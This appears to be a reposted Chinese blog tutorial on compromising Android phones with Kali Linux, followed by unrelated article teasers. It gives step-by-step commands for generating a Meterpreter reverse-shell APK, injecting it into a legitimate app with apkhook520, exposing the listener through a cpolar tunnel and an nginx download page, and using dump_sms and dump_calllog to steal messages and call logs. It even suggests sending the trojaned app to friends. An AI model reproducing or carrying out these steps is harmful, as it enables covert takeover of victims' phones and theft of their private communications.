kali使用msf+apkhook520+cploar实现安卓手的攻击

学习网络安全的过程中,突发奇想怎么才能控制或者说是攻击手机
边找工作边实验

话不多说启动kali

一、使用msf+apktool生成简单的木马程序

首先使用kali自带的msfvenom写上这样一段代码
选择安卓 kali的ip 一个空闲的端口 要输出的文件名

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.7(kali的地址) LPORT=4444(任意空闲端口) -o aaa.apk(自定义文件名称)

接着我们就会得到一个木马安装包
但是现在的安装包安装时会提示你你这是为旧版本打造的无法安装
所以要使用到apktool工具进行反编译,修改安装包的版本
apktool也是kali自带的工具如果没有的话可自行下载
使用这段代码 选择要反编译的文件   生成文件夹的名字 

apktool d aaa.apk(生成的文件) -o aaa(自定义反编译后的文件夹名称)

之后进入生成的文件夹中打开apktool.yml


将这里改为16 和23 保存退出

然后将文件打包生成apk文件

 apktool b aaa(修改后的文件夹) -o bbb.apk(自己命名要生成的文件名称)

由于反编译后会 失去签名,我们还需要给新的安装包签名
这里使用的是java自带的标准库keytool先来生成签名证书

keytool -genkeypair -alias sss(签名证书的别名) -keyalg RSA -validity 100 -keystore sss.jks

最后对apk文件进行签名,输入命令

jarsigner -verbose -keystore sss.jks(签名文件的名称) -signedjar hhh.apk(要生成签名包的名称)

bbb.apk(未签名的包名称) sss(签名证书的别名)

你会发现kali中没有这个命令很尴尬,我也很头痛后来发现,jarsigner 没有这款工具的最终原因是因为没有安装jdk软件包

方法:命令:apt-get update

            命令:apt-get upgrade

            命令:apt-get install openjdk-11-jdk-headless
你也可以在windows中完成对安装包的反编译和签名
可以在这里下载但是必须要有jdk环境 https://ibotpeaches.github.io/Apktool/
使用的时候将木马安装包和下载好后的软件放在同一文件夹下在cmd中执行命令即可例如反编译:


反编译和打包的命令只需要将apktool改为java -jar 你的jar包名

现在可以将生成好的安装包安装到手机上并且关掉手机上的所有防护,无视风险安装

在kali中输入msfconsole命令回车

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.7    //和之前生成木马的IP一样
set LPORT 4444    //和之前生成木马的端口一样
run

输入以上代码开始监听 监听到之后输入help查看可以使用的命令
给程序打开权限命令才能生效

但是这样显得很呆让我们重新开始玩点花的

二、完整的流程

1.内网穿透cploar的使用

需要使用到cploar内网穿透工具可以去官网下载,官网有安装教程

如果使用的是免费版本那么域名是有时间限制的会随机变化

开启cploar后可以使用127.0.0.1/9200进入cploar后台管理页面

选择创建隧道-隧道名称可以随意填写-协议选择http-选择80端口因为nginx默认使用80端口提供服务(你使用nginx哪个端口提供服务这里就写哪个端口)-地区短则china VIP

再创建一个隧道这里我们选择tcp地址选择你木马监听的地址

这里我们可以看到cploar随机生成的域名

2.配置nginx

之后进入nginx的sites-available/default或者nginx.cof写上配置
我们需要展示一个可以下载的文件页面
为了确保可以访问可以进入到nginx.conf文件中将user www-data 更改为user root
让nginx以root身份运行这样nginx就能访问root用户创建的文件

server {listen 80;listen 192.168.0.7(kali的地址);root /你需要展示的目录location / {autoindex on; 开启下载目录}
}

配置完成后可以使用cploar提供的随机域名访问看看是否完成内网穿透并可以下载文件

3.apkhook520的使用

建议:最好使用我提供的连接下载因为大家都用520apkhook我觉的很坑也许是我不会用,反正它没有python文件并且其他人提供文件的也坑各种报错解码不对,路径不对,各种问题光是修改代码就浪费了我大把时间

接下来需要apkhook520工具 可以在这里拉去里面也有作者制作的详细的使用教程
        https://gitee.com/stemmm/apkhook520

在kali中执行以下代码拉取apkhook520

git clone https://gitee.com/stemmm/apkhook520.git

完成后去下载一个正常的apk包我是在豌豆荚中下载了一个老版本的软件一些新版本的软件最后生成后会闪退可能是因为这个工具比较老

然后将apk上传都kali中使用以下代码直接给软件包加马

python main.py --lhost 21.tcp.cpolar.top:10768(这里使用cploar提供的tcp协议的随机域名) --lport 4444(与cploar填写的端口要一直否则无法访问到)  -n ../106_f827d9dd45d90b6dc25e3a76129cf404.apk(正常的安装包)

等待运行完成后将远控apk发送至手机或者你可以直接访问你的网页下载安装包

4.使用mt管理器签名

还需要在手机中下载一个mt管理器

MT管理器2024最新版下载-MT管理器app官方版下载v2.15.0 安卓版-火鸟手游网

 

这里选择签名方案然后确定直接就会自动签名,之后将新生成的安装包无视风险安装安装

5.使用msfconsole监听

接着进入kali执行以下代码

msfconsole -r WorkDir/handler.rc(根据你现在的位置路径要写正确)

它会自动的读取handler.rc文件并设置好监听模式如上图所示

输入sessions命令可以看到它已经监听到并开启了一个会话
输入命令sessions 1进入会话

在这里可以使用相应的命令例如:dump_sms可以查看短信  dump_calllog可以查看通过话记录 它会将读取到的内容以文件形式存储可以使用cat命令查看

更多的命令可以使用help命令查看

好了现在你可以把你的网址发给你的朋友让你的好朋友下载你的加马软件,然后就可以为所欲为了
开个玩笑大家绿色上网,这些都是自己娱乐的切记不要干违法的事情

有很多东西还需要解决,比如说安装时报毒,软件使用的老版本的通常安装之后需要更新否则不让使用,还有就是权限问题还有很多东西需要学习!玩的开心

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/805831.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

kafka(五)——消费者流程分析(c++)

概念 ​ 消费者组(Consumer Group):由多个consumer组成。消费者组内每个消费者负责消费不同分区的数据,一个分区只能由一个组内消费者消费;消费者组之间互不影响。所有的消费者都属于某个消费者组,即消费者…

今日arXiv最热大模型论文:Dataverse,针对大模型的开源ETL工具,数据清洗不再难!

引言:大数据时代下的ETL挑战 随着大数据时代的到来,数据处理的规模和复杂性不断增加,尤其是在大语言模型(LLMs)的开发中,对海量数据的需求呈指数级增长。这种所谓的“规模化法则”表明,LLM的性…

HTML - 请你说一下如何阻止a标签跳转

难度级别:初级及以上 提问概率:55% a标签的默认语义化功能就是超链接,HTML给它的定位就是与外部页面进行交流,不过也可以通过锚点功能,定位到本页面的固定id区域去。但在开发场景中,又避免不了禁用a标签的需求,那么都有哪些方式可以禁用…

【就近接入,智能DNS-Geo DNS ,大揭秘!】

做过后端服务或者网络加速的小伙伴,可能或多或少都听说过,智能DNS或者Geo DNS,就是根据用户的位置,返回离用户最近的服务节点,就近接入,以达到服务提速的效果。 那么大家有没想过,这个背后的原理…

C++:日期类的实现 const修饰 取地址及const取地址操作符重载(类的6个默认成员函数完结篇)

一、日期类的实现 根据之前赋值运算符重载逻辑&#xff0c;我们现在来实现完整的日期类。 1.1 判断小于 上篇博客已经实现: bool operator<(const Date& d) {if (_year < d._year){return true;}else if (_year d._year){if (_month < d._month){return true…

总结C/C++中程序内存区域划分

C/C程序内存分配的几个区域&#xff1a; 1. 栈区&#xff08;stack&#xff09;&#xff1a;在执行函数时&#xff0c;函数内局部变量的存储单元都可以在栈上创建&#xff0c;函数执行结束时这些存储单元自动被释放。栈内存分配运算内置于处理器的指令集中&#xff0c;效率很⾼…

OpenHarmony开发技术:【国际化】实例

国际化 如今越来的越多的应用都走向了海外&#xff0c;应用走向海外需要支持不同国家的语言&#xff0c;这就意味着应用资源文件需要支持不同语言环境下的显示。本节就介绍一下设备语言环境变更后&#xff0c;如何让应用支持多语言。 应用支持多语言 ArkUI开发框架对多语言的…

TypeScript—详解、小案例(配合源代码)

简介&#xff1a;TypeScript是微软开发的 JavaScript 的超集&#xff0c;TypeScript兼容JavaScript&#xff0c;可以载入JavaScript代码然后运行。TypeScript与JavaScript相比进步的地方 包括&#xff1a;加入注释&#xff0c;让编译器理解所支持的对象和函数&#xff0c;编译器…

Web路径专题

文章目录 1.资源定位1.前置条件上下文路径设置 2.上下文路径介绍重点说明 3.资源定位方式资源路径 上下文路径 资源位置a.html定位C.java定位 4.浏览器和服务器解析的区别1.浏览器解析/&#xff08;地址变化&#xff09;2.服务器解析/&#xff08;地址不变&#xff09; 5.带/…

git学习 1

打开自己想要存放git仓库的文件夹&#xff0c;右键打开git bush&#xff0c;用git init命令建立仓库 用 ls -a(表示全都要看&#xff0c;包括隐藏的)可以看到git仓库 也可以用 git clone 接github链接&#xff08;点code选项里面会给链接&#xff0c;结尾是git的那个&#xf…

OpenHarmony南向开发实例:【智能可燃气体检测系统】

样例简介 本项目是基于BearPi套件开发的智能可燃气体检测Demo&#xff0c;该系统内主要由小熊派单板套件和和MQ5可燃气体检测传感器组成。 智能可燃气体检测系统可以通过云和手机建立连接&#xff0c;可以在手机上控制感应的阈值&#xff0c;传感器感知到的可燃气体浓度超过阈…

C++ | Leetcode C++题解之第12题整数转罗马数字

题目&#xff1a; 题解&#xff1a; const string thousands[] {"", "M", "MM", "MMM"}; const string hundreds[] {"", "C", "CC", "CCC", "CD", "D", "DC&qu…

azkaban的写法

先创建一个.job文件和一个.sql文件 sql语法写到一个test名字的文件里&#xff0c;之后job写法如下&#xff1a; typecommand commandhive -f test6.sql 一定要严格写&#xff0c;不管是字母还是空格&#xff0c;单引号中就是sql文件的名字 然后将它们一块打包&#xff0c;启动…

ubuntu系统逻辑卷Logical Volume扩容根分区

Linux LVM详解 https://blog.csdn.net/qq_35745940/article/details/119054949 https://blog.csdn.net/weixin_41891696/article/details/118805670 https://blog.51cto.com/woyaoxuelinux/1870299 LVM&#xff08;Logical Volume Manager&#xff09;逻辑卷管理&#xff0c…

贪心算法|452.用最少数量的箭引爆气球

力扣题目链接 class Solution { private:static bool cmp(const vector<int>& a, const vector<int>& b) {return a[0] < b[0];} public:int findMinArrowShots(vector<vector<int>>& points) {if (points.size() 0) return 0;sort(p…

rk3588开发板上安装ssh服务

目的&#xff1a;实现远程访问和控制&#xff0c;其他主机远程控制rk3588 方法及操作步骤&#xff1a; 1&#xff09;安装&#xff1a;sudo apt install openssh-server 2&#xff09; 查看运行状态 sudo systemctl status ssh 其它主机远程连接该开发板的ip和端口22即可

urwid,一个好用的 Python 库!

更多资料获取 &#x1f4da; 个人网站&#xff1a;ipengtao.com 大家好&#xff0c;今天为大家分享一个好用的 Python 库 - urwid。 Github地址&#xff1a;https://github.com/urwid/urwid Urwid 是一个功能强大的 Python 库&#xff0c;用于创建基于文本的用户界面&#xf…

[23年蓝桥杯H题] 合并石子

问题描述 在桌面从左至右横向摆放着 N 堆石子。每一堆石子都有着相同的颜色&#xff0c;颜 色可能是颜色 0 &#xff0c;颜色 1 或者颜色 2 中的其中一种。 现在要对石子进行合并&#xff0c;规定每次只能选择位置相邻并且颜色相同的两堆 石子进行合并。合并后新堆的相对位置保…

unipush+个推实现消息推送

1.注册个推平台的帐号个推&#xff0c;专业的数据智能服务商-为垂直领域提供数据智能解决方案 2.应用列表中选择新增应用/服务 3.填写下应用信息4.创建好应用后在manifest.json中的sdkConfigs配置上写入appid、appkey、appsecret "sdkConfigs" : {"ad" :…

【Keil5-Boot和APP配置】

Keil5-Boot和App配置 ■ Keil5-Boot和APP配置■ 一&#xff1a;sct文件 sct文件配置■ 二&#xff1a;发布版本不需要在 C/C&#xff0c;Asm&#xff0c;Linker&#xff0c;中添加 CMDDEBUG 宏定义。■ 三&#xff1a;Debug版本需要在Linker添加 --pd"-DCMDDEBUG" 才…